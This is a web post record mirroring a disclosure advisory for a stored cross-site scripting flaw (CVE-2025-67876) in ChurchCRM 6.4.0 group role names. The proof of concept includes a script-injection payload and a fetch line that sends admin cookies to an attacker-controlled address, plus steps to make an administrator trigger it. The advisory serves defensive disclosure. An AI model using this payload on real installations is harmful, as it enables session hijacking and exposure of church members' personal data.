{"id":46297,"date":"2026-04-13T11:50:28","date_gmt":"2026-04-13T11:50:28","guid":{"rendered":"http:\/\/localhost\/?p=46297"},"modified":"2026-04-13T11:50:28","modified_gmt":"2026-04-13T11:50:28","slug":"churchcrm-640-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46297","title":{"rendered":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768"},"content":{"rendered":"

{“lastseen”:”2026-04-13T15:46:41″,”description”:”ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:218768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67876″],”sourceData”:”# CVE-2025-67876: ChurchCRM has Stored XSS in Group Role Name Leading to Admin Session Hijacking\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2025-67876](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-67876) |\\n | **Severity** | CRITICAL |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/ChurchCRM\/CRM\/security\/advisories\/GHSA-j9gv-26c7-3qrh) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **ChurchCRM\/CRM**\\n \\n \\n \\n ## Details\\n \\n ### Summary\\n A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM that allows a low-privilege user with the \u201cManage Groups\u201d permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover.\\n \\n ### Details\\n The root cause is a lack of input validation and output encoding in the handling of group role names.\\n \\n When editing a group in GroupEditor.php, the user can modify the role names. The application does not sanitize the input (e.g., no strip_tags, htmlspecialchars, or server-side validation). The value is stored in the list_lst database table.\\n \\n Later, the stored value is injected directly into HTML without escaping:\\n – In GroupView.php, group roles appear inside table cells wrapped in \\u003cspan\\u003e.\\n – In PersonView.php, the user’s assigned roles are displayed under \u201cAssigned Groups\u201d.\\n Because no escaping is applied, any HTML or JavaScript stored in the role name is executed in the victim\u2019s browser.\\n \\n A low-privilege user (with Manage Groups) can therefore escalate privileges to full administrator by injecting JavaScript into a role and assigning that role to an admin.\\n \\n ### PoC\\n \\n #### Phase 1 – Attacker setup\\n Create x.js on attacker-controlled machine:\\n \\n `fetch(‘http:\/\/172.20.0.1:8000\/log?cookie=’ + encodeURIComponent(document.cookie));`\\n \\n Serve the file:\\n \\n `python3 -m http.server 800`\\n \\n #### Phase 2 – Inject the XSS payload\\n 1. Log in as a user with Manage Groups permission.\\n \\u003cimg width=\\”2301\\” height=\\”833\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/f5e31c57-033a-46e0-b9fb-efa8e2d95440\\” \/\\u003e\\n \\n 2. Navigate to:\\n Groups \u2192 List Groups \u2192 select any group \u2192 Settings.\\n \\n 3. In the \u201cGroup Roles\u201d section, edit an existing role or create a new one.\\n 4. Insert malicious payload:\\n \\n `\\”\\u003e\\u003cscript src=\/\/172.20.0.1:800\/x.js\\u003e\\u003c\/script\\u003e`\\n \\n \\u003cimg width=\\”1901\\” height=\\”904\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/6b98c5cc-2059-416c-8083-279922637ebf\\” \/\\u003e\\n \\n \\n In the Group Roles list, click Default next to the role containing your injected XSS payload.\\n This ensures that the malicious role will automatically be assigned to any user added to the group, increasing the likelihood that an administrator will trigger the XSS when viewing their profile.\\n \\u003cimg width=\\”1893\\” height=\\”371\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/97f973e3-839c-4930-b98e-d7a22653e8f0\\” \/\\u003e\\n Click Delete next to the previous default role, typically \\”Member\\”.\\n Removing the clean default role forces the system to use the XSS-injected role for all future assignments, guaranteeing execution when the victim views any page that displays their assigned role.\\n \\u003cimg width=\\”1892\\” height=\\”343\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/05732ac0-1ff0-4d0b-8e6a-e709037a4005\\” \/\\u003e\\n \\n 5. Save the role name.\\n \\u003cimg width=\\”1718\\” height=\\”595\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/576e31ab-6d1d-4b3e-a6e0-2724d37d06b0\\” \/\\u003e\\n \\n \\n #### Phase 3 – Assign the malicious role to a victim\\n 1. Go to the Group View page.\\n 2. Add any user as a group member (e.g., Church Admin).\\n \\u003cimg width=\\”945\\” height=\\”951\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/9d7773cf-fee0-4f22-943b-460aa189b993\\” \/\\u003e\\n \\n 3. Select the malicious role from the dropdown.\\n 4. Save the assignment.\\n \\u003cimg width=\\”945\\” height=\\”548\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/7f058565-7289-4362-8bf0-f4ad7cd83ad1\\” \/\\u003e\\n \\n #### Phase 4 – Execution of XSS\\n When the victim (admin) visits:\\n – Their user profile: PersonView.php\\n \\u003cimg width=\\”1721\\” height=\\”529\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/c41d159e-04fb-469d-bbdd-acacc58c9174\\” \/\\u003e\\n \\n – The group view page: GroupView.php\\n \\n The stored JavaScript executes immediately.\\n \\n On the attacker server, incoming requests will appear:\\n \\u003cimg width=\\”1722\\” height=\\”558\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/c07cdc46-cb06-4a74-9481-b31391c43efe\\” \/\\u003e\\n \\n \\u003cimg width=\\”945\\” height=\\”422\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/c3bd73ce-2416-4841-9687-4a1d498ab73b\\” \/\\u003e\\n \\n This confirms successful account takeover.\\n \\n ### Impact\\n – Stored XSS\\n – Full administrator session hijacking\\n – Privilege escalation from low-permission user to full system admin\\n – Exposure of all sensitive personal data stored in ChurchCRM\\n \\n \\n ### CWE\\n CWE-79: Improper Neutralization of Input During Web Page Generation (\u2018Cross-site Scripting\u2019)\\n \\n ### Recommendation\\n – Implement output encoding (htmlspecialchars) for all role name renderings.\\n – Validate and sanitize role names on server-side.\\n – Review other list-based editable fields for similar vulnerabilities.\\n – Consider use of a central escaping library or templating engine.\\n \\n ## References\\n \\n – https:\/\/github.com\/ChurchCRM\/CRM\/security\/advisories\/GHSA-j9gv-26c7-3qrh\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218768″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:P\/VC:H\/SC:H\/VI:H\/SI:H\/VA:L\/SA:L”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218768\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-13T15:46:41″,”description”:”ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:218768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67876″],”sourceData”:”# CVE-2025-67876: ChurchCRM has…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-46297","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46297\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-13T15:46:41″,”description”:”ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:218768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67876″],”sourceData”:”# CVE-2025-67876: ChurchCRM has...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46297\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:28+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768\",\"datePublished\":\"2026-04-13T11:50:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"},\"wordCount\":1126,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\",\"name\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46297","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","og_description":"{“lastseen”:”2026-04-13T15:46:41″,”description”:”ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:218768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67876″],”sourceData”:”# CVE-2025-67876: ChurchCRM has...","og_url":"https:\/\/zero.redgem.net\/?p=46297","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:28+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46297#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46297"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768","datePublished":"2026-04-13T11:50:28+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46297"},"wordCount":1126,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46297#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46297","url":"https:\/\/zero.redgem.net\/?p=46297","name":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:28+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46297#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46297"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46297#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46297"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46297\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}